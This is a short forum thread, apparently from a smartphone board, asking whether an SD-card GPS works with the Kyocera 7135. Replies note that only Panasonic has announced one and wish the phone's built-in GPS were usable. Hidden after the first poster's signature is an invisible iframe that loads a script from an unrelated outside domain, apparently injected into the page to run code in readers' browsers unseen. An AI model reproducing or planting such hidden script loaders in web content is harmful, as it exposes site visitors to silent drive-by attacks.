+ Reply to Thread

Thread: GPS SD card

GPS SD card

Anyone know of a GPS SD Card that would work with the 7135?

AJaM<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: GPS SD card

Originally posted by AJaM
    Anyone know of a GPS SD Card that would work with the 7135?

AJaM
    how about an SD GPS card that doesn't work on the 7135. Excactly one vendor, Matsu****a (panasonic) has announced that they are developing an SD GPS card. The announcement came early last year, and there has been no additional comments from them since. As far as I know, there are none on the market yet (unless maybe you can get one in Japan. They seem to have everything there before we even here about it here....)

Alan

Re: Re: GPS SD card

Originally posted by alanb
    how about an SD GPS card that doesn't work on the 7135. Excactly one vendor, Matsu****a (panasonic) has announced that they are developing an SD GPS card. The announcement came early last year, and there has been no additional comments from them since. As far as I know, there are none on the market yet (unless maybe you can get one in Japan. They seem to have everything there before we even here about it here....)

Alan
    forget about the SD GPS, I just hope someone could figure out how to use the included GPS as an GPS.